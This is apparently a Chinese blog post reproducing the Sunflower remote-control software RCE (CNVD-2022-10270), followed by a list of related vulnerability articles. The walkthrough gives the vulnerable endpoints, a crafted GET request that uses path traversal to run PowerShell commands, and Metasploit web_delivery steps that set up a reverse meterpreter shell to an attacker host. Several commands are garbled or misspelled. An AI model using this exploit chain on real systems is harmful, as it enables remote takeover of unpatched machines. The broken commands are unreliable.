14 向日葵远程RCE漏洞

简介: 向日葵是一款远控软件

漏洞发现

向日葵远控使用时会默认打开一个多个端口供服务使用 但是开启的端口不固定,所以需要通过扫描探测 影响范围版本在11.0.33以下版本存在 向日葵个人版 for Windows<=11.0.0.33 向日葵简约版<=V1.0.1.43315(2021.12)

漏洞复现

端口扫描

nmap

Railgun

image.png

得到端口之后一个一个访问

出现以上界面,说明存在了向日葵远程rce漏洞

漏洞利用

命令执行

获取verify_string值 需要verify_string的值象作为CID进行传输认证 访问接口/cgi-bin/rpc?action=verify-haras 获取cookie 52cCBrRfK7tKFiNjOvSmoapmykt3Clg2

image.png

将获取到cookie的值复制下来

打开burp

把verify_string的值添加进cookie中 访问/check接口添加cmd参数进行执行命令 使用burp进行修改数据包的内容

添加修改数据包

GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/power shel1. exe%20whoani

Cookie:CID=.......

image.png

image.png

msf向日葵利用

msfconsole
search multi/script/web_delivery
use multi/script/web_delivery
show options
show targets
set targets 2
set payload windows/X64/meterpreter/reserve_tcp
set lhost .......
set lp
exploitort
复制粘贴修改

image.png

相关文章
|
3月前
|
安全 Linux Shell
Kali渗透测试-远程控制:6200端口变成“后门”
Kali渗透测试-远程控制:6200端口变成“后门”
59 0
|
安全 网络安全 Windows
向日葵RCE复现 | CNVD-2022-10270 CNVD-2022-03672
向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。 于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
479 0
向日葵RCE复现 | CNVD-2022-10270 CNVD-2022-03672
|
安全 网络安全 Windows
向日葵RCE(CNVD-2022-10270)
向日葵RCE(CNVD-2022-10270)
224 0
|
安全 PHP 缓存
网站漏洞修复之Discuz X3.4远程代码执行漏洞
近期在对discuz x3.4进行全面的网站渗透测试的时候,发现discuz多国语言版存在远程代码执行漏洞,该漏洞可导致论坛被直接上传webshell,直接远程获取管理员权限,linux服务器可以直接执行系统命令,危害性较大,关于该discuz漏洞的详情,我们来详细的分析看下。
5265 0
|
运维 安全 前端开发
[PiKaChu靶场通关]RCE远程代码执行(上)
[PiKaChu靶场通关]RCE远程代码执行
426 0
[PiKaChu靶场通关]RCE远程代码执行(上)
|
安全 PHP
[PiKaChu靶场通关]RCE远程代码执行(下)
[PiKaChu靶场通关]RCE远程代码执行
164 0
[PiKaChu靶场通关]RCE远程代码执行(下)
|
SQL 安全 关系型数据库
ecshop 全系列版本通杀漏洞 远程代码执行sql注入漏洞
ecshop漏洞于2018年9月12日被某安全组织披露爆出,该漏洞受影响范围较广,ecshop2.73版本以及目前最新的3.0、3.6、4.0版本都受此次ecshop漏洞的影响,主要漏洞是利用远程代码执行sql注入语句漏洞,导致可以插入sql查询代码以及写入代码到网站服务器里,严重的可以直接获取服务器的管理员权限,甚至有些网站使用的是虚拟主机,可以直接获取网站ftp的权限,该漏洞POC已公开,使用简单,目前很多商城网站都被攻击,危害较大,针对于此我们SINE安全对该ECSHOP漏洞的详情以及如何修复网站的漏洞,及如何部署网站安全等方面进行详细的解读。
551 0
ecshop 全系列版本通杀漏洞 远程代码执行sql注入漏洞
|
存储 缓存 安全
Discuz 网站漏洞修复之远程代码执行漏洞
近期SINE安全在对discuz x3.4进行全面的网站渗透测试的时候,发现discuz多国语言版存在远程代码执行漏洞,该漏洞可导致论坛被直接上传webshell,直接远程获取管理员权限,linux服务器可以直接执行系统命令,危害性较大,关于该discuz漏洞的详情,我们来详细的分析看下。
810 0
Discuz 网站漏洞修复之远程代码执行漏洞
|
Kubernetes 安全 Dubbo
omcat 又爆出高危漏洞!!Tomcat 8.5 ~ 10 中招…
ava技术栈 www.javastack.cn 关注阅读更多优质文章
omcat 又爆出高危漏洞!!Tomcat 8.5 ~ 10 中招…

热门文章

最新文章